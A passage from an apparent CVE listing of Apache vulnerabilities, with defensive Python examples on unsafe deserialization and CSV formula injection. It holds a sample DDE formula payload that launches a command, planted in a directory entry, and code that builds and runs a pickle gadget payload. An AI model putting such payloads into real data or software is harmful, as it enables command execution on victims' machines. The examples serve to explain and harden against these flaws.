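    return pickle.dumps(obj)


def make_gadget_payload() -> bytes:
    """What an attacker would put on the wire (constructed here for the demo)."""
    return pickle.dumps(Gadget())


def loads_unrestricted(data: bytes) -> Any:
    """The vulnerable consumer: any class reachable by name can be instantiated."""
    return pickle.loads(data)


def loads_restricted(data: bytes) -> Any:
    """The hardened consumer: only allowlisted classes can be instantiated."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_refused(data: bytes) -> bool:
    try:
        loads_restricted(data)
        return False
    except pickle.UnpicklingError:
        return True


if __name__ == "__main__":
    good = serialize(OrderEvent("A-1", 1250))
    print("restricted, legitimate message:", loads_restricted(good))
    bad = make_gadget_payload()
    print("restricted, gadget refused:", is_refused(bad), "executed:", EXECUTED)
    loads_unrestricted(bad)
    print("unrestricted, gadget ran:", EXECUTED)
```

The point that transfers to the Java cases is the ordering: the allowlist check runs when the class reference is read, before construction, so a rejected stream never gets as far as the gadget's constructor, readObject or equivalent. Denylisting known gadget classes, the other common response, fails as soon as a new gadget chain is published.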
CVE-2015-5349 HIGH

The CSV export in Apache LDAP Studio and Apache Directory Studio before 2.0.0-M10 does not properly escape field values, which might allow attackers to execute arbitrary commands by leveraging a crafted LDAP entry that is interpreted as a formula when imported into a spreadsheet.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-77,

Products Affected

Vendor Product Version
apache directory_studio 1.3.0
apache directory_studio 1.5.3
apache directory_studio 1.0.0
apache directory_studio 1.1.0
apache directory_studio 1.2.0
apache directory_studio 1.5.2
apache ldap_studio 0.8.0
apache ldap_studio 0.7.0
apache ldap_studio 0.8.1
apache ldap_studio 0.6.0
apache directory_studio 1.4.0
apache directory_studio 1.0.1
apache directory_studio 1.5.0
apache directory_studio 2.0.0
apache directory_studio 1.5.1
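CVE-2015-5349 is CSV (formula) injection: a directory attribute whose value starts with =, +, - or @ is written into the export unchanged, and the spreadsheet that later opens the file evaluates it, which on some platforms reaches DDE and runs a command. The Python below is an added example, not Directory Studio's code or its patch: a vulnerable exporter beside a hardened one that neutralizes every cell, plus a checker that reports which cells a spreadsheet would still evaluate. The sample entries are constructed.

```python
import csv
import io
from typing import Any, Dict, List

# A cell beginning with one of these is evaluated as a formula by common spreadsheets.
# Tab and CR are included because some applications strip leading whitespace before
# deciding, so "\t=cmd" is still executed.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value: Any) -> str:
    """Return text a spreadsheet will display literally instead of evaluating."""
    text = "" if value is None else str(value)
    if text.startswith(FORMULA_TRIGGERS):
        # A leading apostrophe marks the cell as text. This does change the data:
        # a phone number "+1-555-0100" round-trips as "'+1-555-0100".
        text = "'" + text
    return text


def export_entries_csv_raw(entries: List[Dict[str, Any]], attributes: List[str]) -> str:
    """The vulnerable exporter: attribute values are written exactly as stored."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\r\n")
    writer.writerow(attributes)
    for entry in entries:
        writer.writerow([str(entry.get(attr, "")) for attr in attributes])
    return buf.getvalue()


def export_entries_csv(entries: List[Dict[str, Any]], attributes: List[str]) -> str:
    """Hardened exporter: every cell neutralized, every field quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\r\n")
    writer.writerow(attributes)
    for entry in entries:
        writer.writerow([neutralize_cell(entry.get(attr, "")) for attr in attributes])
    return buf.getvalue()


def read_csv_rows(text: str) -> List[List[str]]:
    """Parse CSV text back into rows, i.e. what the importing spreadsheet sees."""
    return list(csv.reader(io.StringIO(text, newline="")))


def formula_cells(text: str) -> List[str]:
    """Cells in a CSV document that a spreadsheet would still evaluate."""
    return [cell for row in read_csv_rows(text) for cell in row
            if cell.startswith(FORMULA_TRIGGERS)]


# Constructed directory entries; the last description is the kind of value an
# attacker with write access to the directory would plant.
SAMPLE_ENTRIES = [
    {"cn": "Alice Example", "mail": "alice@example.test", "description": "Engineering"},
    {"cn": "Bob Example", "mail": "bob@example.test", "description": "+1-555-0100"},
    {"cn": "Mallory", "mail": "mallory@example.test",
     "description": "=cmd|' /C calc'!A0"},
]

if __name__ == "__main__":
    columns = ["cn", "mail", "description"]
    print("raw export evaluates:", formula_cells(export_entries_csv_raw(SAMPLE_ENTRIES, columns)))
    print("hardened export evaluates:", formula_cells(export_entries_csv(SAMPLE_ENTRIES, columns)))
```

The checker deliberately flags Bob's phone number as well as Mallory's payload: a leading "+" or "-" is ambiguous between data and formula, and the exporter cannot tell a phone number from an attack, so the neutralizing prefix has to be applied uniformly and the consumer told that the apostrophe is part of the safe format.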
CVE-2015-5351 MEDIUM

The (1) Manager and (2) Host Manager applications in Apache Tomcat 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 establish sessions and send CSRF tokens for arbitrary new requests, which allows remote attackers to bypass a CSRF protection mechanism by using a token.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache tomcat 7.0.47
apache tomcat 8.0.27
apache tomcat 8.0.0
apache tomcat 8.0.20
apache tomcat 7.0.39
apache tomcat 8.0.22
apache tomcat 7.0.56
apache tomcat 8.0.14
apache tomcat 7.0.12
apache tomcat 8.0.3
apache tomcat 8.0.11
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 7.0.28
apache tomcat 7.0.62
apache tomcat 7.0.21
apache tomcat 7.0.33
apache tomcat 8.0.23
apache tomcat 7.0.40
debian debian_linux 8.0
canonical ubuntu_linux 16.04
apache tomcat 7.0.59
apache tomcat 7.0.65
apache tomcat 9.0.0
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 7.0.25
apache tomcat 7.0.57
apache tomcat 8.0.21
apache tomcat 7.0.37
apache tomcat 7.0.54
apache tomcat 7.0.42
apache tomcat 8.0.17
canonical ubuntu_linux 15.10
apache tomcat 7.0.35
apache tomcat 7.0.64
apache tomcat 7.0.23
apache tomcat 8.0.29
apache tomcat 7.0.19
canonical ubuntu_linux 12.04
apache tomcat 7.0.61
apache tomcat 8.0.15
apache tomcat 7.0.67
apache tomcat 7.0.29
canonical ubuntu_linux 14.04
apache tomcat 8.0.30
apache tomcat 8.0.26
apache tomcat 7.0.34
apache tomcat 7.0.20
apache tomcat 7.0.14
apache tomcat 8.0.24
apache tomcat 8.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
debian debian_linux 7.0
apache tomcat 7.0.26
apache tomcat 8.0.12
apache tomcat 7.0.55
apache tomcat 7.0.27
apache tomcat 7.0.2
apache tomcat 8.0.28
apache tomcat 7.0.52
apache tomcat 7.0.63
apache tomcat 7.0.53
apache tomcat 7.0.22
apache tomcat 7.0.30
apache tomcat 8.0.18
CVE-2015-6420 HIGH

Serialized-object interfaces in certain Cisco Collaboration and Social Media; Endpoint Clients and Client Software; Network Application, Service, and Acceleration; Network and Content Security Devices; Network Management and Provisioning; Routing and Switching - Enterprise and Service Provider; Unified Computing; Voice and Unified Communications Devices; Video, Streaming, TelePresence, and Transcoding Devices; Wireless; and Cisco Hosted Services products allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache commons_collections *
apache commons_collections 4.0
CVE-2015-6524 MEDIUM

The LDAPLoginModule implementation in the Java Authentication and Authorization Service (JAAS) in Apache ActiveMQ 5.x before 5.10.1 allows wildcard operators in usernames, which allows remote attackers to obtain credentials via a brute force attack. NOTE: this identifier was SPLIT from CVE-2014-3612 per ADT2 due to different vulnerability types.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-255,

Products Affected

Vendor Product Version
apache activemq 5.6.0
apache activemq 5.3.1
apache activemq 5.4.2
fedoraproject fedora 23
apache activemq 5.8.0
apache activemq 5.9.0
apache activemq 5.5.0
apache activemq 5.4.0
apache activemq 5.4.3
apache activemq 5.1.0
apache activemq 5.3.2
apache activemq 5.3.0
apache activemq 5.0.0
apache activemq 5.10.0
fedoraproject fedora 22
apache activemq 5.5.1
apache activemq 5.7.0
apache activemq 5.2.0
apache activemq 5.4.1
apache activemq 5.9.1
CVE-2015-7430 MEDIUM

The Hadoop connector 1.1.1, 2.4, 2.5, and 2.7.0-0 before 2.7.0-3 for IBM Spectrum Scale and General Parallel File System (GPFS) allows local users to read or write to arbitrary GPFS data via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache hadoop 2.5.0
apache hadoop 2.4.0
apache hadoop 2.7.0
apache hadoop 1.1.1
CVE-2015-7520 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in the (1) RadioGroup and (2) CheckBoxMultipleChoice classes in Apache Wicket 1.5.x before 1.5.15, 6.x before 6.22.0, and 7.x before 7.2.0 allow remote attackers to inject arbitrary web script or HTML via a crafted "value" attribute in a <input> element.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache wicket *
CVE-2015-7521 HIGH

The authorization framework in Apache Hive 1.0.0, 1.0.1, 1.1.0, 1.1.1, 1.2.0 and 1.2.1, on clusters protected by Ranger and SqlStdHiveAuthorization, allows attackers to bypass intended parent table access restrictions via unspecified partition-level operations.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache hive 1.1.0
apache hive 1.0.0
apache hive 1.0.1
apache hive 1.2.0
apache hive 1.2.1
CVE-2015-7559 MEDIUM

It was found that the Apache ActiveMQ client before 5.14.5 exposed a remote shutdown command in the ActiveMQConnection class. An attacker logged into a compromised broker could use this flaw to achieve denial of service on a connected client.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 2.7 LOW CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L 1.2 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-306,CWE-20,

Products Affected

Vendor Product Version
redhat jboss_fuse 6.3
redhat jboss_a-mq 6.2.1
redhat jboss_a-mq 6.3
apache activemq *
CVE-2015-7611 HIGH

Apache James Server 2.3.2, when configured with file-based user repositories, allows attackers to execute arbitrary system commands via unspecified vectors.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,

Products Affected

Vendor Product Version
apache james_server 2.3.2
CVE-2015-8320 MEDIUM

Apache Cordova-Android before 3.7.0 improperly generates random values for BridgeSecret data, which makes it easier for attackers to conduct bridge hijacking attacks by predicting a value.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache cordova *
CVE-2015-8795 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in the Admin UI in Apache Solr before 5.1 allow remote attackers to inject arbitrary web script or HTML via crafted fields that are mishandled during the rendering of the (1) Analysis page, related to webapp/web/js/scripts/analysis.js or (2) Schema-Browser page, related to webapp/web/js/scripts/schema-browser.js.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache solr *
CVE-2015-8796 MEDIUM

Cross-site scripting (XSS) vulnerability in webapp/web/js/scripts/schema-browser.js in the Admin UI in Apache Solr before 5.3 allows remote attackers to inject arbitrary web script or HTML via a crafted schema-browse URL.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache solr *
CVE-2015-8797 MEDIUM

Cross-site scripting (XSS) vulnerability in webapp/web/js/scripts/plugins.js in the stats page in the Admin UI in Apache Solr before 5.3.1 allows remote attackers to inject arbitrary web script or HTML via the entry parameter to a plugins/cache URI.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache solr *
CVE-2016-0706 MEDIUM

Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 does not place org.apache.catalina.manager.StatusManagerServlet on the org/apache/catalina/core/RestrictedServlets.properties list, which allows remote authenticated users to bypass intended SecurityManager restrictions and read arbitrary HTTP requests, and consequently discover session ID values, via a crafted web application.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat 8.0.20
apache tomcat 8.0.22
apache tomcat 8.0.14
apache tomcat 6.0.43
apache tomcat 8.0.3
apache tomcat 8.0.11
apache tomcat 6.0.29
apache tomcat 6.0.37
apache tomcat 7.0.62
apache tomcat 7.0.33
apache tomcat 6.0.36
apache tomcat 6.0.32
apache tomcat 7.0.40
apache tomcat 6.0.4
apache tomcat 6.0.2
canonical ubuntu_linux 16.04
apache tomcat 9.0.0
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 7.0.57
apache tomcat 6.0.33
apache tomcat 8.0.17
apache tomcat 7.0.64
apache tomcat 6.0.13
apache tomcat 8.0.15
apache tomcat 7.0.67
apache tomcat 6.0.26
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 6.0.20
apache tomcat 6.0.30
apache tomcat 7.0.6
debian debian_linux 7.0
apache tomcat 7.0.27
apache tomcat 6.0.24
apache tomcat 7.0.53
apache tomcat 7.0.30
apache tomcat 6.0.14
apache tomcat 6.0.41
apache tomcat 8.0.18
apache tomcat 7.0.47
apache tomcat 8.0.27
apache tomcat 8.0.0
apache tomcat 7.0.39
apache tomcat 7.0.56
apache tomcat 6.0.1
apache tomcat 7.0.12
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 7.0.28
apache tomcat 7.0.21
apache tomcat 8.0.23
apache tomcat 6.0.44
debian debian_linux 8.0
apache tomcat 7.0.59
apache tomcat 7.0.65
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.25
apache tomcat 8.0.21
apache tomcat 7.0.37
apache tomcat 7.0.54
apache tomcat 7.0.42
canonical ubuntu_linux 15.10
apache tomcat 7.0.35
apache tomcat 7.0.23
apache tomcat 8.0.29
apache tomcat 7.0.19
canonical ubuntu_linux 12.04
apache tomcat 7.0.61
apache tomcat 6.0.39
apache tomcat 7.0.29
canonical ubuntu_linux 14.04
apache tomcat 8.0.30
apache tomcat 8.0.26
apache tomcat 7.0.20
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 8.0.24
apache tomcat 8.0.1
apache tomcat 7.0.10
apache tomcat 7.0.26
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 8.0.12
apache tomcat 7.0.55
apache tomcat 6.0.11
apache tomcat 7.0.2
apache tomcat 8.0.28
apache tomcat 7.0.52
apache tomcat 7.0.63
apache tomcat 7.0.22
apache tomcat 6.0.35
CVE-2016-0707 LOW

The agent in Apache Ambari before 2.1.2 uses weak permissions for the (1) /var/lib/ambari-agent/data and (2) /var/lib/ambari-agent/keys directories, which allows local users to obtain sensitive information by reading files in the directories.

CVSS 2.0

Severity: LOW

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache ambari *
CVE-2016-0709 HIGH

Directory traversal vulnerability in the Import/Export function in the Portal Site Manager in Apache Jetspeed before 2.3.1 allows remote authenticated administrators to write to arbitrary files, and consequently execute arbitrary code, via a .. (dot dot) in a ZIP archive entry, as demonstrated by "../../webapps/x.jsp."

CVSS 2.0

Severity: HIGH

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache jetspeed *
CVE-2016-0710 HIGH

Multiple SQL injection vulnerabilities in the User Manager service in Apache Jetspeed before 2.3.1 allow remote attackers to execute arbitrary SQL commands via the (1) role or (2) user parameter to services/usermanager/users/.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache jetspeed *
CVE-2016-0711 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in Apache Jetspeed before 2.3.1 allow remote attackers to inject arbitrary web script or HTML via the title parameter when adding a (1) link, (2) page, or (3) folder resource.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jetspeed *
CVE-2016-0712 MEDIUM

Cross-site scripting (XSS) vulnerability in Apache Jetspeed before 2.3.1 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to portal.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jetspeed *
CVE-2016-0714 MEDIUM

The session-persistence implementation in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 mishandles session attributes, which allows remote authenticated users to bypass intended SecurityManager restrictions and execute arbitrary code in a privileged context via a web application that places a crafted object in a session.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 8.0.20
apache tomcat 8.0.22
apache tomcat 8.0.14
apache tomcat 6.0.43
apache tomcat 8.0.3
apache tomcat 8.0.11
apache tomcat 6.0.29
apache tomcat 6.0.37
apache tomcat 7.0.62
apache tomcat 7.0.33
apache tomcat 6.0.36
apache tomcat 6.0.32
apache tomcat 7.0.40
apache tomcat 6.0.4
apache tomcat 6.0.2
canonical ubuntu_linux 16.04
apache tomcat 9.0.0
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 7.0.57
apache tomcat 6.0.33
apache tomcat 8.0.17
apache tomcat 7.0.64
apache tomcat 6.0.13
apache tomcat 8.0.15
apache tomcat 7.0.67
apache tomcat 6.0.26
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 6.0.20
apache tomcat 6.0.30
apache tomcat 7.0.6
debian debian_linux 7.0
apache tomcat 7.0.27
apache tomcat 6.0.24
apache tomcat 7.0.53
apache tomcat 7.0.30
apache tomcat 6.0.14
apache tomcat 6.0.41
apache tomcat 8.0.18
apache tomcat 7.0.47
apache tomcat 8.0.27
apache tomcat 8.0.0
apache tomcat 7.0.39
apache tomcat 7.0.56
apache tomcat 6.0.1
apache tomcat 7.0.12
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 7.0.28
apache tomcat 7.0.21
apache tomcat 8.0.23
apache tomcat 6.0.44
debian debian_linux 8.0
apache tomcat 7.0.59
apache tomcat 7.0.65
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.25
apache tomcat 8.0.21
apache tomcat 7.0.37
apache tomcat 7.0.54
apache tomcat 7.0.42
canonical ubuntu_linux 15.10
apache tomcat 7.0.35
apache tomcat 7.0.23
apache tomcat 8.0.29
apache tomcat 7.0.19
canonical ubuntu_linux 12.04
apache tomcat 7.0.61
apache tomcat 6.0.39
apache tomcat 7.0.29
canonical ubuntu_linux 14.04
apache tomcat 8.0.30
apache tomcat 8.0.26
apache tomcat 7.0.20
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 8.0.24
apache tomcat 8.0.1
apache tomcat 7.0.10
apache tomcat 7.0.26
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 8.0.12
apache tomcat 7.0.55
apache tomcat 6.0.11
apache tomcat 7.0.2
apache tomcat 8.0.28
apache tomcat 7.0.52
apache tomcat 7.0.63
apache tomcat 7.0.22
apache tomcat 6.0.35
CVE-2016-0731 MEDIUM

The File Browser View in Apache Ambari before 2.2.1 allows remote authenticated administrators to read arbitrary files via a file: URL in the WebHDFS URL configuration.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache ambari *
CVE-2016-0733 HIGH

The Admin UI in Apache Ranger before 0.5.1 does not properly handle authentication requests that lack a password, which allows remote attackers to bypass authentication by leveraging knowledge of a valid username.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache ranger *
CVE-2016-0734 MEDIUM

The web-based administration console in Apache ActiveMQ 5.x before 5.13.2 does not send an X-Frame-Options HTTP header, which makes it easier for remote attackers to conduct clickjacking attacks via a crafted web page that contains a (1) FRAME or (2) IFRAME element.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-254,

Products Affected

Vendor Product Version
apache activemq 5.6.0
apache activemq 5.3.1
apache activemq 5.4.2
apache activemq 5.11.1
apache activemq 5.8.0
apache activemq 5.9.0
apache activemq 5.13.0
apache activemq 5.12.1
apache activemq 5.4.0
apache activemq 5.4.3
apache activemq 5.1.0
apache activemq 5.3.0
apache activemq 5.0.0
apache activemq 5.10.0
apache activemq 5.10.1
apache activemq 5.7.0
apache activemq 5.11.2
apache activemq 5.4.1
apache activemq 5.10.2
apache activemq 5.9.1
apache activemq 5.12.2
apache activemq 5.11.0
apache activemq 5.5.0
apache activemq 5.12.0
apache activemq 5.3.2
apache activemq 5.5.1
apache activemq 5.2.0
CVE-2016-0735 MEDIUM

Apache Ranger 0.5.x before 0.5.2 allows remote authenticated users to bypass intended parent resource-level access restrictions by leveraging mishandling of a resource-level exclude policy.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache ranger 0.5.1
apache ranger 0.5.0
CVE-2016-0736 MEDIUM

In Apache HTTP Server versions 2.4.0 to 2.4.23, mod_session_crypto was encrypting its data/cookie using the configured ciphers with possibly either CBC or ECB modes of operation (AES256-CBC by default), hence no selectable or builtin authenticated encryption. This made it vulnerable to padding oracle attacks, particularly with CBC.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-310,

Products Affected

Vendor Product Version
apache http_server 2.4.7
apache http_server 2.4.0
apache http_server 2.4.19
apache http_server 2.4.23
apache http_server 2.4.2
apache http_server 2.4.6
apache http_server 2.4.20
apache http_server 2.4.12
apache http_server 2.4.22
apache http_server 2.4.3
apache http_server 2.4.16
apache http_server 2.4.10
apache http_server 2.4.1
apache http_server 2.4.8
apache http_server 2.4.9
apache http_server 2.4.21
apache http_server 2.4.14
CVE-2016-0760 MEDIUM

Multiple incomplete blacklist vulnerabilities in Apache Sentry before 1.7.0 allow remote authenticated users to execute arbitrary code via the (1) reflect, (2) reflect2, or (3) java_method Hive builtin functions.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache sentry 1.6.0
apache sentry 1.5.1
CVE-2016-0762 MEDIUM

The Realm implementations in Apache Tomcat versions 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 did not process the supplied password if the supplied user name did not exist. This made a timing attack possible to determine valid user names. Note that the default configuration includes the LockOutRealm which makes exploitation of this vulnerability harder.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 2.2 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-203,

Products Affected

Vendor Product Version
netapp snap_creator_framework -
redhat enterprise_linux_eus 7.7
redhat enterprise_linux_server_aus 7.4
redhat enterprise_linux_server_tus 7.6
netapp oncommand_shift -
oracle communications_diameter_signaling_router *
redhat enterprise_linux_eus 7.5
redhat enterprise_linux_eus 7.6
debian debian_linux 8.0
apache tomcat *
redhat enterprise_linux_eus 7.4
redhat enterprise_linux_server_aus 7.7
canonical ubuntu_linux 16.04
redhat enterprise_linux_server_tus 7.7
netapp oncommand_insight -
apache tomcat 9.0.0
oracle tekelec_platform_distribution *
redhat jboss_enterprise_web_server 3.0.0
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_server 7.0
CVE-2016-0763 MEDIUM

The setGlobalContext method in org/apache/naming/factory/ResourceLinkFactory.java in Apache Tomcat 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M3 does not consider whether ResourceLinkFactory.setGlobalContext callers are authorized, which allows remote authenticated users to bypass intended SecurityManager restrictions and read or write to arbitrary application data, or cause a denial of service (application disruption), via a web application that sets a crafted global context.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 7.0.47
apache tomcat 8.0.27
apache tomcat 8.0.0
apache tomcat 8.0.20
apache tomcat 7.0.39
apache tomcat 8.0.22
apache tomcat 7.0.56
apache tomcat 8.0.14
apache tomcat 7.0.12
apache tomcat 8.0.3
apache tomcat 8.0.11
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 7.0.28
apache tomcat 7.0.62
apache tomcat 7.0.21
apache tomcat 7.0.33
apache tomcat 8.0.23
apache tomcat 7.0.40
debian debian_linux 8.0
canonical ubuntu_linux 16.04
apache tomcat 7.0.59
apache tomcat 7.0.65
apache tomcat 9.0.0
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 7.0.25
apache tomcat 7.0.57
apache tomcat 8.0.21
apache tomcat 7.0.37
apache tomcat 7.0.54
apache tomcat 7.0.42
apache tomcat 8.0.17
canonical ubuntu_linux 15.10
apache tomcat 7.0.35
apache tomcat 7.0.64
apache tomcat 7.0.23
apache tomcat 8.0.29
apache tomcat 7.0.19
canonical ubuntu_linux 12.04
apache tomcat 7.0.61
apache tomcat 8.0.15
apache tomcat 7.0.67
apache tomcat 7.0.29
canonical ubuntu_linux 14.04
apache tomcat 8.0.30
apache tomcat 8.0.26
apache tomcat 7.0.34
apache tomcat 7.0.20
apache tomcat 7.0.14
apache tomcat 8.0.24
apache tomcat 8.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
debian debian_linux 7.0
apache tomcat 7.0.26
apache tomcat 8.0.12
apache tomcat 7.0.55
apache tomcat 7.0.27
apache tomcat 7.0.2
apache tomcat 8.0.28
apache tomcat 7.0.52
apache tomcat 7.0.63
apache tomcat 7.0.53
apache tomcat 7.0.22
apache tomcat 7.0.30
apache tomcat 8.0.18
CVE-2016-0779 HIGH

The EjbObjectInputStream class in Apache TomEE before 1.7.4 and 7.x before 7.0.0-M3 allows remote attackers to execute arbitrary code via a crafted serialized object.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache tomee *
apache tomee 7.0.0
CVE-2016-0782 LOW

The administration web console in Apache ActiveMQ 5.x before 5.11.4, 5.12.x before 5.12.3, and 5.13.x before 5.13.2 allows remote authenticated users to conduct cross-site scripting (XSS) attacks and consequently obtain sensitive information from a Java memory dump via vectors related to creating a queue.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache activemq 5.6.0
apache activemq 5.3.1
apache activemq 5.4.2
apache activemq 5.11.1
apache activemq 5.8.0
apache activemq 5.9.0
apache activemq 5.13.0
apache activemq 5.12.1
apache activemq 5.4.0
apache activemq 5.4.3
apache activemq 5.1.0
apache activemq 5.3.0
apache activemq 5.10.0
apache activemq 5.10.1
apache activemq 5.7.0
apache activemq 5.11.2
apache activemq 5.11.3
apache activemq 5.13.1
apache activemq 5.4.1
apache activemq 5.10.2
apache activemq 5.9.1
apache activemq 5.12.2
apache activemq 5.11.0
apache activemq 5.5.0
apache activemq 5.12.0
apache activemq 5.3.2
apache activemq 5.5.1
apache activemq 5.2.0
CVE-2016-0783 MEDIUM

The sendHashByUser function in Apache OpenMeetings before 3.1.1 generates predictable password reset tokens, which makes it easier for remote attackers to reset arbitrary user passwords by leveraging knowledge of a user name and the current system time.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache openmeetings *
CVE-2016-0784 MEDIUM

Directory traversal vulnerability in the Import/Export System Backups functionality in Apache OpenMeetings before 3.1.1 allows remote authenticated administrators to write to arbitrary files via a .. (dot dot) in a ZIP archive entry.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache openmeetings *
CVE-2016-0785 HIGH

Apache Struts 2.x before 2.3.28 allows remote attackers to execute arbitrary code via a "%{}" sequence in a tag attribute, aka forced double OGNL evaluation.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts *
CVE-2016-0956 HIGH

The Servlets Post component 2.3.6 in Apache Sling, as used in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0, allows remote attackers to obtain sensitive information via unspecified vectors.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache sling *
adobe experience_manager 6.1.0
adobe experience_manager 6.0.0
adobe experience_manager 5.6.1
CVE-2016-1000031 HIGH

Apache Commons FileUpload before 1.3.3 DiskFileItem File Manipulation Remote Code Execution

CVSS 2.0

Severity: HIGH

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache commons_fileupload *
CVE-2016-1000104 MEDIUM

A security bypass vulnerability exists in the FcgidPassHeader Proxy in mod_fcgid through 2016-07-07.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
opensuse leap 42.1
opensuse opensuse 13.2
apache mod_fcgid *
CVE-2016-1181 MEDIUM

ActionServlet.java in Apache Struts 1 1.x through 1.3.10 mishandles multithreaded access to an ActionForm instance, which allows remote attackers to execute arbitrary code or cause a denial of service (unexpected memory access) via a multipart request, a related issue to CVE-2015-0899.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache struts 1.2.4
apache struts 1.3.6
apache struts 1.3.5
apache struts 1.0.1
oracle banking_platform 2.4.1
